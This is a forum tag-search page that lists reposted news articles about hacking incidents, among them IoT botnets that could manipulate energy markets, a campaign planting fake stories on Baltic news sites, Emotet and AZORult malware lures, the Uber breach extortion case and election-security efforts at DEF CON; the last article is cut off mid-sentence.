Jump to content

Search the Community

Showing results for tags 'hackers'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Found 57 results

  1. Hackers Could Use IoT Botnets to Manipulate Energy Markets With access to just 50,000 high-wattage smart devices, attackers could make a bundle off of causing minor fluctuations. Researchers calculated that by running an attack for three hours a day, 100 days a year, market manipulators could take home as much as $24 million per year.Photograph: George Rose/Getty Images On a Friday morning in the fall of 2016, the Mirai botnet wrecked havoc on internet infrastructure, causing major website outages across the United States. It was a wake-up call, revealing the true damage that zombie armies of malware-infected gadgets could cause. Now, researchers at the Georgia Institute of Technology are thinking even farther afield about targets that botnets could someday disrupt—such as energy markets. At the Black Hat security conference on Wednesday, the researchers will present their findings, which suggest that high-wattage IoT botnets—made up of power-guzzling devices like air conditioners, car chargers, and smart thermostats—could be deployed strategically to increase demand at certain times in any of the nine private energy markets around the US. A savvy attacker, they say, would be able to stealthily force price fluctuations in the service of profit, chaos, or both. The researchers used real, publicly available data from the New York and California markets between May 2018 and May 2019 to study fluctuations in both the "day-ahead market" that forecasts demand and the "real-time market," in which buyers and sellers correct for forecasting errors and unpredictable events like natural disasters. By modeling how much power various hypothetical high-wattage IoT botnets could draw, and crunching the market data, the researchers devised two types of potential attacks that would alter energy pricing. They also figured out how far hackers would be able to push their attacks without the malicious activity raising red flags. "Our basic assumption is that we have access to a high-wattage IoT botnet," says Tohid Shekari, a PhD candidate at the Georgia Institute of Technology who contributed to the research, along with fellow PhD candidate Celine Irvine and professor Raheem Beyah. "In our scenarios, attacker one is a market player; he’s basically trying to maximize his own profit. Attacker two is a nation-state actor who can cause financial damage to market players as part of a trade war or cold war. The basic part of either attack is to look at price-load sensitivity. If we change demand by 1 percent, how much is the price going to change as a result of that? You want to optimize the attack to maximize the gain or damage." An attacker could use their botnet's power to increase demand, for instance, when other entities are betting it will be low. Or they could bet that demand will go up at a certain time with certainty that they can make that happen. Unlike regular IoT botnets that are ubiquitous and available for hire on criminal forums, high-wattage botnets are not as practical to amass. None are known to be available for rent by would-be attackers. But over the past couple of years, researchers have begun investigating how they could be weaponized—one example looked at the possibility of mass blackouts—in anticipation that such botnets will someday emerge. Meanwhile, the idea of energy market manipulation in general is not far-fetched. The US Federal Energy Regulatory Commission investigated 16 potential market manipulation cases in 2018, though it closed 14 of them with no action. Additionally, in mid-May, attackers breached the IT systems of Elexon, the platform used to run the United Kingdom's energy market. The attack did not appear to result in market changes. The researchers caution that, based on their analysis, much smaller demand fluctuations than you might expect could affect pricing, and that it would take as few as 50,000 infected devices to pull off an impactful attack. In contrast, many current criminal IoT botnets contain millions of bots. Consumers whose devices are unwittingly conscripted into a high-wattage botnet would also be unlikely to notice anything amiss; attackers could intentionally turn on devices to pull power late at night or while people are likely to be out of the house. The idea is to maximize strategic moments that both capitalize on market conditions and help maintain a low profile. The researchers calculated that market manipulation campaigns would cause, at most, a 7 percent increase in consumers' home electric bills, likely low enough to go unnoticed. For hackers, the rewards could be significant. The researchers calculated that by running an attack for three hours per day, 100 days per year, market manipulators could take home as much as $24 million a year. And a determined saboteur could use the same type of attacks to cause as much as $350 million per year in economic damage. It's difficult to know, though, how such attacks would actually play out in practice. For example, the researchers assumed that one attacker attempting to launch botnet-driven market manipulation campaigns at a time in a given region. Multiple actors attempting the same scam in the same place could degrade their returns or make it more likely that they'd get caught. The research also assumes both the existence of high-wattage IoT botnets and that they would be consistent and predictable platforms. Still, the fact that such attacks were relatively easy to conceive and model indicates that they could be crazy enough to work someday. The researchers emphasize that their goal is to promote prevention and defense before that happens. They suggest that high-wattage IoT devices should include some type of real-time monitoring that could flag suspicious use potentially consistent with a malware infection. And they suggest that energy markets revisit how much granular and constantly updating load data they need to release publicly. Limiting that access wouldn't make it impossible for attackers to get their hands on the data, but it would add a barrier to entry. "It's an example of how the threat landscape changes in unexpected ways," says Beyah, who also cofounded the industrial-control security firm Fortiphyd Logic. "Who would have thought that my washing machine or stationary bike could be the foundation of a completely new type of attack?" Hackers Could Use IoT Botnets to Manipulate Energy Markets
  2. Hackers Broke Into Real News Sites to Plant Fake Stories A disinfo operation broke into the content management systems of Eastern European media outlets in a campaign to spread misinformation about NATO. The propagandists have created and disseminated disinformation since at least March of 2017, with a focus on undermining NATO and the US troops in Poland and the Baltics.Photograph: PETRAS MALUKAS/Getty Images Over the last few years, online disinformation has taken evolutionary leaps forward, with the Internet Research Agency pumping out artificial outrage on social media and hackers leaking documents—both real and fabricated—to suit their narrative. More recently, Eastern Europe has faced a broad campaign that takes fake news ops to yet another level: hacking legitimate news sites to plant fake stories, then hurriedly amplifying them on social media before they're taken down. On Wednesday, security firm FireEye released a report on a disinformation-focused group it's calling Ghostwriter. The propagandists have created and disseminated disinformation since at least March of 2017, with a focus on undermining NATO and the US troops in Poland and the Baltics; they've posted fake content on everything from social media to pro-Russian news websites. In some cases, FireEye says, Ghostwriter has deployed a bolder tactic: Hacking the content management systems of news websites to post their own stories. They then disseminate their literal fake news with spoofed emails, social media, and even op-eds the propagandists write on other sites that accept user-generated content. That hacking campaign, targeting media sites from Poland to Lithuania, has spread false stories about a US military aggression, NATO soldiers spreading coronavirus, NATO planning a full-on invasion of Belarus, and more. “They’re spreading these stories that NATO is a danger, that they resent the locals, that they’re infected, that they’re car thieves,” says John Hultquist, director of intelligence at FireEye. “And they’re pushing these stories out with a variety of means, the most interesting of which is hacking local media websites and planting them. These fictional stories are suddenly bona fide by the sites that they’re on, and then they go in and spread the link to the story.” FireEye itself did not conduct incident response analysis on these incidents, and concedes that it doesn't know exactly how the hackers are stealing credentials that give them access to the content management systems that allow posting and altering news stories. Nor does it know who is behind the string of website compromises, or for that matter the larger disinformation campaign that the fake stories are a part of. But the company's analysts have found that the news site compromises and the online accounts used to spread links to those fabricated stories, as well as the more traditional creation of fake news on social media, blogs, and websites with an anti-US and anti-NATO bent, all tie back to a distinct set of personas, indicating one unified disinformation effort. FireEye's Hultquist points out that the campaign doesn't seem financially motivated, indicating a political or state backer, and notes that the focus on driving a wedge between NATO and citizens of Eastern Europe hints at possible Russian involvement. Nor would it be the first time that Russian hackers planted fake news stories; in 2017 US intelligence agencies concluded that Russian hackers breached Qatar's state news agency and planted a fake news story designed to embarrass the country's leader and cause a rift with the US, though US intelligence never confirmed the Kremlin's involvement. "We can’t concretely tie it to Russia at this time, but it’s certainly in line with their interests," Hultquist says of the Ghostwriter campaign. "It wouldn’t be a surprise to me if this is where the evidence leads us." Two false stories planted on the Lithuanian news site Kas Vyksta Kaune, one about a planned NATO invasion of Belarus (left) and another about German soldiers desecrating a Jewish cemetery, including a photoshopped image that shows a military vehicle with a German flag. Screenshot: Archive.is via Kas Vyksta Kaune False news stories planted on the Baltics-focused news sites The Baltic Course and The Baltic Times claim a US armored vehicle ran over and killed a Lithuanian child (left) and that the first Covid-19 patient in Lithuania is a U.S. soldier who had previously “visited public places and participated in city events with child and youth participation.”Screenshot: Archive.is via The Baltic Course; The Baltic Times In June of 2018, for instance, the English-language, Baltics-focused news site the Baltic Course published a story claiming that a US Stryker armored vehicle had collided with a Lithuanian child on a bicycle, killing the child "on the spot." The same day, the Baltic Course posted a notice to the site that "hackers posted this news about the deceased child, which is FAKE!!! We thank our vigilant Lithuanian readers who reported on our Facebook page about fake new on site. We strengthened security measures." A few months later, the Lithuanian news site Kas Vyksta Kaune published a story stating that "NATO plans to invade Belarus," showing a map of how NATO forces in Polish and Baltic countries would enter the neighboring country. Kas Vyksta Kaune later acknowledged that the story was fake, and planted by hackers. Someone had used a former employee's credentials to gain access to the CMS. Then in September of last year, another fake story was posted to the site about German NATO soldiers desecrating a Jewish cemetery, including what FireEye describes as a photoshopped image of a military vehicle with a German flag visible behind the cemetery. More recently, the fake stories have attempted to exploit fears of Covid-19. One story posted to both Kas Vyksta Kaune and the English-language Baltic Times in January claimed that the first Covid-19 case in Lithuania was a US soldier who was hospitalized in critical condition, but only after he "visited public places and participated in city events with child and youth participation," according to the Baltic Times version of the story. In April and May of this year, the focus turned toward Poland: A fake story was posted across several Polish news sites in which a US official disparaged local Polish forces as disorganized and incompetent. This time the campaign went even beyond news sites. A fake letter from a Polish military official was posted to the Polish Military Academy website, calling on the Polish military to cease military exercises with the US, decrying the US "occupation" of Poland and calling the exercises a "obvious provocation" of Russia. The Polish government quickly called out the letter as fake. FireEye's finding that all of those operations to plant fake news were carried out by a single group comes on the heels of a report from the New York Times that Russia's military intelligence agency, the GRU, has been coordinating the publication of disinformation on sites like InfoRos, OneWorld.press and GlobalResearch.ca. US intelligence officials speaking to the I said that disinformation campaign, which included false reports that Covid-19 originated in the US, was specifically the work of the GRU's "psychological warfare unit," known as Unit 54777. Given the GRU's role in meddling in the 2016 presidential election, including its hack-and-leak operations against the Democratic National Committee and the Clinton Campaign, any GRU role in more recent disinformation raises fears that they may be targeting the 2020 election as well. While FireEye has made no such claims that the Ghostwriter news site compromises were the work of the GRU, Hultquist argues that the incidents in Poland and the Baltics should nonetheless serve as a warning. Even if false stories are spotted quickly and taken down, they could have a significant, temporary effect on public opinion, he warns. "My concern is that we could see this sort of compromised media tactic in the West and even during the election. It’s a perfect sort of last-minute tactic," Hultquist says. "Once the genie is out of the bottle, can you get it back in? Can you make enough people understand this is some foreign power that’s pushed this story? It may be too late." Hackers Broke Into Real News Sites to Plant Fake Stories
  3. ALERT! Hackers are using coronavirus maps to attack your computer, steal information If there weren't enough ways already to loot people's money online, hackers have now started to attack users' computers and steal important information using coronavirus maps. According to Shai Alfasi, a security researcher at Reason Labs, hackers are using these maps to steal information of users including user names, passwords, credit card numbers, and other info stored in your browser. The fraudsters have designed websites related to coronavirus, asking users to download an application that keeps you updated on the outbreak. The application shows you a map of how COVID-19 is spreading. It is used by the hackers to generate a malicious binary file and install it on your computer. Even though the maps are real, they are generated from a different URL from the original source. As of now, only the Windows computers have been hit but Alfasi expects attackers to work on a new version that might affect other systems too. The researcher said that a malicious software known as AZORult is being used for this purpose. The software steals data from your computer and infect it with other malware as well. The software is allegedly used to steal browsing history, cookies, ID/passwords, cryptocurrency and more. Coronavirus impact The Global stock markets suffered a historic setbacks on Friday over the coronavirus crisis. The virus has killed nearly 5,000 and infected sport, schools and society across the planet. Japan's stock market fell more than 10 percent on Friday, following the worst day on Wall Street since the crash of 1987 as traders scrambled to sell everything on fears the virus will catapult the world into a deep recession. Meanwhile, Italy has become the second country after China to report over 1000 deaths due to coronavirus. The coutry has reported 1,016 deaths, adding that at least 15,113 people are infected with the virus. Civil protection officials say 1,258 have recovered, although the number of cases has gone up by 2,651 since Wednesday. Italy is the world`s worst-hit country after China. Source
  4. Hackers Can Now Send Malware over Bluetooth Researchers at ERNW Insulator, a German security firm have found a crucial vulnerability that lets attackers run malicious code on some Android devices. The vulnerability CVE-2020-0022 – BlueFrag has now been patched in the latest February 2020 security update. If left unpatched, BlueFrag lets malicious actors steal personal data from your Android phone running Oreo 8.0 and Pie 9.0 without user interaction. The attacker just needs to be in the Bluetooth range along with the Bluetooth MAC address of your device to take over your phone. The researchers have not published a technical report detailing the vulnerability so far as attackers could take advantage of the details. They aim to release the description and proof of concept code of the vulnerability once OEMs push security patches to their devices. You probably need not worry about BlueFrag if your phone is running Android 10. The researchers mention that the exploit does not affect Android 10 as it results in a Bluetooth crash when they tested. The report states that devices running Android versions below Oreo 8.0 could also be affected by the vulnerability and hence, it is recommended to update your smartphone to the latest security patch (if available) to stay safe. With that said, it is worth pointing out that most Android phones running on Android Oreo probably would have reached EOL in terms of software updates and security patches. In that case, your handset would be left vulnerable forever, if brands don’t take an initiative to roll out this patch to all the discontinued devices. If your device has not received the February security patch so far, the security firm recommends switching on Bluetooth only when in use, and keeping your device non-discoverable. Source
  5. New Coronavirus Strain? Nope, Just Hackers Trying to Spread Malware PhotoCredit: NurPhoto via Getty The hackers have been using files and emails that warn about a new coronavirus strain to trick users into opening them. Doing so can secretly deliver malware to the victim's machine. Received a random file about the coronavirus? It's best to avoid opening it. Hackers are starting to exploit fears around the ongoing outbreak to infect computers with malware, according to security researchers. The attacks have been occurring through files and emails that pretend to know something about the coronavirus, but have actually been designed to take over the victim's computer. On Wednesday, the hackers were spotted sending out spam emails to users in Japan, warning about a new strain of coronavirus reaching the island country, according to IBM Security. The emails, which are written in Japanese, urge the recipient to open up the attached Word document to learn more. If macros are enabled, the opened document will be able to execute a series of commands to secretly download the Emotet malware, which can steal sensitive information from your machine or deliver other dangerous payloads, such as ransomware. The email pretends to come from a disability welfare service provider: "This new approach to delivering Emotet may be significantly more successful, due to the wide impact of the coronavirus and the fear of infection surrounding it," IBM Security said in the report. "We expect to see more malicious email traffic based on the coronavirus in the future, as the infection spreads. This will probably include other languages too." On Thursday, the security firm Kaspersky Lab also reported uncovering malicious files disguised as documents about a new strain of coronavirus. To deliver the payload, the hackers were using PDFs, MP4 files and Word documents. "The file names imply that they contain video instructions on how to protect yourself from the virus, updates on the threat and even virus detection procedures, which is not actually the case," Kaspersky Lab said. In reality, the discovered files contained a range of different malware threats capable of destroying, blocking modifying and copying data on the victim's machine. "So far we have seen only 10 unique files, but as this sort of activity often happens with popular media topics, we expect that this tendency may grow," said Kaspersky malware analyst Anton Ivanov in a statement. On Friday, the security firm updated the number of detected malicious files to 32. Source
  6. Your items aren't safe on public servers. If you play Fallout 76 you might want to avoid public servers for a while. According to multiple posts on the game's Reddit forums -- and confirmed by publisher Bethesda -- hackers have attacked public servers and wiped out the inventories of more than a few players. A post from one of the Overseers warns that "Your weapons and armor, and any other inventory items are not safe." It also appears that Bethesda is unable to restore lost items, so if they're gone, they're gone for good. Of course, there's never a good time for a hack like this, but slap bang in the middle of the festive period is arguably the worst. Bethesda says it's actively working on a solution, and is also looking at ways it can compensate affected players. As the hack has only hit PC, it's planning on bringing the PC version of the game offline to release a fix, but whether things get sorted this side of the fast-approaching holiday remains to be seen. More At: Bleeding Cool Source
  7. But they didn’t cover their tracks Recently, The Verge reported on a string of ransomware attacks that have hit cities including Baltimore; Atlanta, Georgia; Newark, New Jersey; and 22 Texas towns. Even The Weather Channel has fallen victim. But before those attacks, there was an attack on the nation’s capital, days before the presidential inauguration. An article from The Wall Street Journal details how hackers Alexandru Isvanca and Eveline Cismaru seized control of Washington, DC’s surveillance cameras right before Trump’s inauguration. The piece is full of twists and turns, from the small-time beginnings of the hackers’ scamming careers to them eventually turning on each other. The story contains a lot of colorful details about the pair. Here are some highlights: The hackers weren’t initially trying to hit DC police cameras. They caught a break after sending out hundreds of thousands of emails containing ransomware to a list of addresses purchased on the dark web — it just so happened that at least one was connected to DC police. In the end, they controlled 126 out of 186 DC police computers, which in turn controlled the surveillance cameras. Isvanca and Cismaru led authorities straight to a smoking gun. Well, at least a barbecuing device called a smoking gun. It turns out the pair used that same hacked DC police computer in a separate Amazon scam Cismaru was running. She ordered a smoking gun, and the tracking number showed up on the police computer, allowing authorities to see and raid the package’s destination. Isvanca didn’t do a great job of covering his tracks either. He ordered pizza using the same email address he used to hack the computers. Cismaru said that hacking into the capital’s surveillance system was easy. “Americans are stupid,” she said in a text to The Wall Street Journal. You can read the rest of the fascinating details in the full story here. Source: Hackers hijacked the capital’s surveillance cameras days before Trump’s inauguration and said it was easy (via The Verge)
  8. Two computer hackers have pleaded guilty to concocting an extortion scheme that entangled Uber in a year-long cover-up of a data breach that stole sensitive information about 57 million of the ride-hailing service's passengers and drivers. The pleas entered in a San Jose, California, federal court by Brandon Charles Glover and Vasile Mereacre resurrected another unseemly episode in Uber's checkered history. Glover, 26, and Mereacre, 23, acknowledged stealing personal information from companies that was stored on Amazon Web Services from October 2016 to January 2017 and then demanding to be paid to destroy the data. Uber met the hackers' demand with a US$100,000 (RM417,000) payment, but waited until November 2017 to reveal that the personal information of both its riders and drivers around the world had fallen into the hands of criminals. US attorney David Anderson ripped into Uber for not immediately alerting authorities about the loss of so much personal information that could have been used for identity theft and other malicious purposes. "Companies like Uber are the caretakers, not the owners, of customers' personal information," Anderson said in a statement. Uber declined to comment on the guilty pleas and Anderson's criticism. The San Francisco company has previously said it mishandled the data breach. By the time Uber came clean about the incident, it had ousted its co-founder, Travis Kalanick, as CEO. Dara Khosrowshahi was then brought in to replace Kalanick and burnish an image that had been tarnished by revelations of rampant sexual harassment within Uber's ranks, attempts to dupe government regulators and accusations of stealing self-driving car technology. As part of their scheme, Glover and Mereacre also tried to blackmail Lynda.com, part of professional networking service LinkedIn, according to authorities. Instead of meeting those demands, LinkedIn tried to identify the extortionists, the government said. The two men each face up to five years and prison and a US$250,000 (RM1mil) fine. A status conference about their sentencing has been scheduled before US District Judge Lucy Koh. Source: Hackers plead guilty in data breach that Uber covered up (via The Star Online)
  9. Microsoft Corp said it has tracked "significant" cyberattacks coming from a group it calls "Strontium" or "Fancy Bear", targeting anti-doping authorities and global sporting organisations. The group, also called APT28, has been linked to the Russian government, Microsoft said in a blog post. At least 16 national and international sporting and anti-doping organisations across three continents were targeted in the attacks which began on Sept 16, according to the company. The company said some of these attacks had been successful, but the majority had not. Microsoft has notified all customers targeted in these attacks. Strontium, one of the world's oldest cyber espionage groups, has also been called Sofancy and Pawn Storm by a range of security firms and government officials. Security firm CrowdStrike has said the group may be associated with the Russian military intelligence agency GRU. Microsoft said Strontium reportedly released medical records and emails taken from sporting organisations and anti-doping officials in 2016 and 2018, resulting in an indictment in a federal court in the United States in 2018. The software giant added that the methods used in the most recent attacks were similar to those used by Strontium to target governments, militaries, think-tanks, law firms, human rights organisations, financial firms and universities around the world. Strontium's methods include spear-phishing, password spray, exploiting Internet-connected devices and the use of both open-source and custom malware, it added. Microsoft has in the past taken legal steps o prevent Strontium from using fake Microsoft internet domains to execute its attacks. By August last year, Microsoft had shut down 84 fake websites in 12 court-approved actions over the past two years. Microsoft said at the time that hackers linked to Russia's government sought to launch cyber attacks on US political groups. Source: Microsoft says Russia-linked hackers target sports organisations (via The Star Online)
  10. New 20,000 batch of payment card details found on the dark web and traced back to new Click2Gov hacks. Two years after hackers first started targeting local government payment portals, attacks are still going on, with eight cities having had their Click2Gov payment portals compromised in the last month alone, security researchers from Gemini Advisory have revealed in a report shared with ZDNet today. These new hacks have allowed hackers to get their hands on over 20,000 payment card details belonging to US citizens, which are now being traded on the dark web, the cyber-security firm said. History of Click2Gov hacks Click2Gov is a web-based portal sold by Central Square, formerly known as Superion, to US and Canadian municipalities, small and large alike. It comes as a cloud-based offering and in a self-hosted version. Once up and running, Click2Gov provides a self-service portal where US citizens can pay taxes and bills. Such portals are widespread across the US and are not only used by locals, but also by Americans living across the country to pay bills and taxes for property they own in other cities or states. In 2017, a hacker group began targeting self-hosted Click2Gov portals that had been lagging behind with software patches. According to a FireEye report, this hacker group developed two never-before-seen malware strains named Firealarm and Spotlight, specifically for attacks Click2Gov portals. The first malware was capable of sifting through Click2Gov logs to identify and steal payment card data, while the second was designed to intercept card data in real-time, from HTTP traffic. During 2017 and 2018, the group is believed to have compromised the Click2Gov portals of at least 46 US cities and stolen up to 300,000 payment card details, according to reports from Risk Based Security [1, 2] and Gemini Advisory. Once sold on carding forums, Gemini Advisory researchers believe the stolen card details netted hackers over $1.7 million in revenue. New attacks last month But after the initial attacks, Central Square (then named Superion) did its due diligence and released security updates to address the various vulnerabilities hackers were using in previous attacks. But in a report shared with ZDNet today, Gemini Advisory said that hackers have continued to breach new Click2Gov portals. The company said it recently discovered a new 20,000 batch of payment card details that it tracked to compromises of Click2Gov portals at eight US cities. All eight were running up-to-date Click2Gov versions, and all hacks took place last month, August 2019. In addition, six cities had also suffered Click2Gov compromises in the first wave of attacks, in 2017 and 2018. New victims: Pocatello, ID; Broken Arrow, OK. Re-compromised victims: Palm Bay, FL; Deerfield Beach, FL; Milton, FL; Coral Fields, FL; Bakersfield, CA; Ames, IA. Currently, Gemini Advisory can't say how the hackers got in. For the six towns that had been compromised in the past, it may be possible that hackers left a hidden backdoor during the first hack, which they used to re-gain access to Click2Gov systems this summer. However, it remains unclear how hackers gained entry to the Click2Gov portals of the two other cities that weren't compromised before. One could point the finger at a new Click2Gov vulnerability, but things aren't that easy. Hackers could have very easily used spear-phishing, password spraying, or credential stuffing attacks to gain access to an administrator's account. Blaming the attacks on a new vulnerability may not be accurate. A Central Square spokesperson did not return a request for comment before this article's publication seeking more information from the company's side. US cities notified "Gemini attempted to reach out to several of these eight towns about the second wave of breaches; while most did not respond, those that did confirm a breach in their Click2Gov utility payment portals," the company said today in its report. "Certain towns that did not respond to Gemini's outreach have taken their Click2Gov portals offline shortly after we attempted to contact them." Everyone who paid taxes or bills on the Click2Gov self-service portals of the eight aforementioned cities are now advised to review payment card logs and request new cards from their banks. Source
  11. The unprecedented attack on Apple iPhones revealed by Google this week was broader than first thought. Multiple sources with knowledge of the situation said that Google’s own Android operating system and Microsoft Windows PCs were also targeted in a campaign that sought to infect the computers and smartphones of the Uighur ethnic group in China. That community has long been targeted by the Chinese government, in particular in the Xinjiang region, where surveillance is pervasive. Google’s and Microsoft’s operating systems were targeted via the same websites that launched the iPhone hacks, according to the sources, who spoke on the condition of anonymity. That Android and Windows were targeted is a sign that the hacks were part of a broad, two-year effort that went beyond Apple phones and infected many more than first suspected. One source suggested that the attacks were updated over time for different operating systems as the tech usage of the Uighur community changed. Android and Windows are still the most widely used operating systems in the world. They both remain hugely attractive targets for hackers, be they government-sponsored or criminal. Neither Microsoft nor Google had provided comment at the time of publication. It’s unclear if Google knew or disclosed that the sites were also targeting other operating systems. One source familiar with the hacks claimed Google had only seen iOS exploits being served from the sites. Apple has yet to offer any statement on the attacks and hadn’t provided comment on the latest developments. Google told Apple which sites had been targeted in February, according to one source close to Google, whose researchers revealed the attacks on August 29. But no one has yet named which specific Uighur-interest sites were used to launch malicious code on iPhones. It's unclear exactly what Android and Windows exploits were launched via the websites that were used to launch attacks on Apple's OS. In the case of the iOS hacks, the exploits placed malware on the phone and could spy on a massive amount of data. That included encrypted WhatsApp, iMessage and Telegram texts, as well as live location. Sustained surveillance in Xinjiang The attacks appear to form part of a mass surveillance operation taking place on Uighur civilians, who've faced various forms of persecution in Xinjiang. Surveillance cameras are scattered across the region and facial recognition is prevalent. "The Chinese government has been systematically targeting the Uighur population for surveillance and imprisonment for years," said Cooper Quintin, senior staff technologist at the Electronic Frontier Foundation. "These attacks likely have the goal of spying on the Uighur population in China, the Uyghur diaspora outside of China and people who sympathize with and might wish to help the Uighur in their struggle for independence." Quintin told Forbes this appeared to be a "high-risk, high-reward campaign" that was trying to scoop up as much intelligence on possible Uighur sympathizers as possible. One source told TechCrunch, which first reported the Uighur targeting, that it's likely even those who weren't part of the ethnic group were hit. Source
  12. As the 2020 election looms and legislation to secure voting machines languishes, politicians head to the largest hacking conference in the world for help. For two years in a row, hackers at Defcon have demonstrated that voting machines currently in use in US elections have serious security issues. With the 2020 US presidential election quickly approaching, lawmakers who want to fix those vulnerabilities are heading to the Las Vegas hacking conference, which starts Thursday, to see them in person. Many lawmakers have wanted to pass an election security bill since the race for the White House in 2016, when Russian hackers interfered with the election. A Senate Intelligence Committee report released in late July detailed how the hackers likely targeted election systems in all 50 states. In states such as Illinois and Florida, they were successful. While there's no evidence that any votes were tampered with during the 2016 election, hackers have shown plenty of proof that the voting machines being used are vulnerable to attacks. Lawmakers like Sen. Ron Wyden, a Democrat from Oregon, have proposed legislation to improve election security to make sure these vulnerabilities wouldn't affect future voters. "White hat hackers do an invaluable public service in this technologic age by identifying security holes and, if necessary, shaming the government or the companies responsible into fixing them," Wyden said in a statement. "The success of the Voting Village -- in which public demonstrations of voting machine flaws by hackers at Defcon quickly convinced officials in Virginia to promptly move to paper-based voting systems -- is a prime example of how the computer security community has positively impacted public policy and protected our national security." Despite those efforts, Congress hasn't been able to pass an election security bill. Senate Majority Leader Mitch McConnell, a Republican from Kentucky, blocked two election security bills in July, calling it "partisan legislation." This comes after former special counsel Robert Mueller warned Congress last month that Russia would continue its efforts to hack US elections, telling lawmakers, "They're doing it as we sit here." Along with Wyden, Rep. Eric Swalwell, a Democrat from California, will also be at the Voting Village at the hacker conference. There, hackers and election security experts will have an opportunity to explain to lawmakers what policies are needed to keep voters safe from hackers. "The overwhelming interest we are seeing from government leaders demonstrates that securing our democracy is a national security priority and we need policy solutions that address the concerns brought to light each year by this Village," Voting Village co-founder Harri Hursti said in a statement. This is the first year that Defcon has volunteers specifically to help politicians integrate with hackers and learn about issues in cybersecurity. The outreach could potentially affect proposed legislation that would keep cities, elections and devices secure for years to come. Rep. Ted Lieu, a Democrat from California and Rep. Jim Langevin, a Democrat from Rhode Island, will also be at the hacking convention to learn how policymakers can affect future legislation on cybersecurity. "I became one of the first members of Congress to attend Defcon when I spoke two years ago about how security researchers have shaped my work," Langevin said in a statement. "I know firsthand the incredible value and knowledge the Defcon community can offer to policymakers. I'm looking forward to returning to the conference this year to keep the lines of communication open." A new machine Lawmakers at the Voting Village will be able to see a prototype of a $10 million DARPA-funded open source voting machine, designed to prevent hackers from tampering with people's votes. The project is headed by Galois, a government contractor that DARPA awarded in March. Since then, Galois has also worked with Microsoft to develop ElectionGuard, software for voting machines to verify ballots. While in both years that the Voting Village has existed, hackers were able to find vulnerabilities, Galois is aiming to bring the first voting machine that hackers at Defcon can't crack. But even if hackers do find vulnerabilities with the prototype, which its creators expect to happen, it's a win-win. "There's an ambition that this demonstration will not have vulnerabilities comparable to what's in the room," Joe Kiniry, a principal scientist at Galois, said in an interview. "But of course, the point of the exercise is to learn. If they do find flaws, it helps the researchers put on a different thinking cap and adjust their work over the next 2.5 years while this project continues." Galois's machine reads votes on paper, and verifies that the vote is valid through scans. It'll be equipped with a secure CPU that Galois created, designed to prevent against common attacks that other voting machines have fallen to in previous Voting Villages. Kiniry said the team has been looking at voting machines for nearly two decades, learning from past mistakes. This prototype, he said, goes beyond normal voting machine standards. "We're building things that aim to have a security profile comparable to the work we do for the Department of Defense and intelligence agencies," Kiniry said. "Showing that we can do that for a voting system, we hope will show the world that it is really possible to raise the bar." The project is open-source, so that voting machine vendors can adopt the security features for its own devices in future elections. If successful, lawmakers will be able to see this technology as another step for election security legislation. Source
  13. Crooks fail to hijack infosec bloke's site to dress it up as a legit Euro bank login page Think you have bad luck? Imagine being the script kiddie who inadvertently tried and failed to pwn an Akamai security pro. Larry Cashdollar, a senior security response engineer at the US-based global web giant, told us late last week he just recently noticed something peculiar in the logs on his personal website. Further investigation turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities. Anyone in charge of public-facing servers will know these boxes come under continuous scanning and probing by miscreants, bots, and security researchers all the time. However, in this particular case, Cashdollar has today helpfully documented his findings as a heads up, or warning, to website admins and webapp developers. If anything, you should ensure your software is not vulnerable to RFI, otherwise you may well fall to the same fools who tried to pwn the infosec engineer's website. He told The Register his site's logs showed the would-be attacker probing for RFI holes that would allow them to trick web applications into fetching and running a remote malicious script. In this case, the scumbag was trying, unsuccessfully, to load a file via a custom tool Cashdollar had created for his site. "Based on my log entries they appear to be parsing web sites looking for form variables and automatically testing if those variables allow remote file inclusion," Cashdollar told El Reg. "It’s a generic test against any website where they can parse out the form input variable and then supply a URL to that variable to see if the content is included and executed." Unfortunately for the attacker, Cashdollar also used the logs to follow the GET requests to the payload the attacker was trying to load: a script that attempted to harvest information about his server. By dissecting that and other files the hacker had ready to execute commands and take over vulnerable websites, Cashdollar was also able to extract the criminal's email address and their preferred language – Portuguese. While RFI exploits are usually performed to hijack a web server, in this case Cashdollar believes the attackers were trying something different: using file-injecting holes as a way to transform the site into a base for phishing. The miscreant's arsenal of scripts included commands that would create HTML files on the victim's server that mimicked the site of a popular European bank. In other words, the attacker was probing for an RFI vulnerability that would allow them to quietly install phishing pages on the host server that masqueraded as a legit bank's login webpage, and then direct victims to those pages to harvest their bank account credentials as they tried to log into the fake. Source
  14. Not long before Tom Bossert was pushed out of his role last year as the White House's top cybersecurity official, a public remark he made at the World Economic Forum in Davos, Switzerland raised eyebrows. Image:Tom Bossert Bossert wanted, he said, to introduce policies that would let the US government "get our hands around the necks" of the enemy hackers who cost the US billions of dollars every year. Reporters, and some fellow officials, took the comment a little too literally; after the talk, Bossert found himself explaining that he didn't mean actual, physical violence. Today, however, Bossert is in business for himself, pitching an approach that's almost as aggressive, if somewhat more subtle: getting his hands around the network communications of enemy hackers, and using that chokepoint to inflict confusion, cost, and (figurative) pain. After a year largely out of public view, Bossert today revealed his role as cofounder of a startup called Trinity, along with CEO Steve Ryan, a former deputy director of the NSA's Threat Operations Center, and Marie "Neill" Sciarrone, a former BAE exec who served as a cybersecurity advisor to George W. Bush. Backed by $23 million in investment led by Intel Capital, Trinity offers what Bossert describes as a "third way" between traditional cyberdefense and private sectors "hacking back" to play offense. Instead, Trinity will offer its customers a service that Bossert describes as "active threat interference." It will, essentially, place itself between the company's network and the hackers targeting it, monitoring all incoming and outgoing traffic for signs of foul play. When it finds malicious activity, Trinity promises not merely to alert the customer to the attempted intrusion or to block it, but instead to alter it, messing with the hackers' tools—and their minds. The result, Bossert says, will give hackers a taste of the frustrations and uncertainties that have long plagued defenders. "If we don’t change the equation to something that actually stops and prevents and imposes cost on the adversary, we’re not going to get in front of the problem," says Bossert. "It’s flat out, I’m-pissed-off time to do it." Hacking Hacks, Not Hacking Back Trinity's tricks, the founders claim, include meddling with the authentication 